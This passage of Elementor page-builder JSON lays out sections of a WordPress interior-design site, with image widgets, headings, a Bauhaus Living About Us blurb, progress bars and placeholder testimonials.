"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept 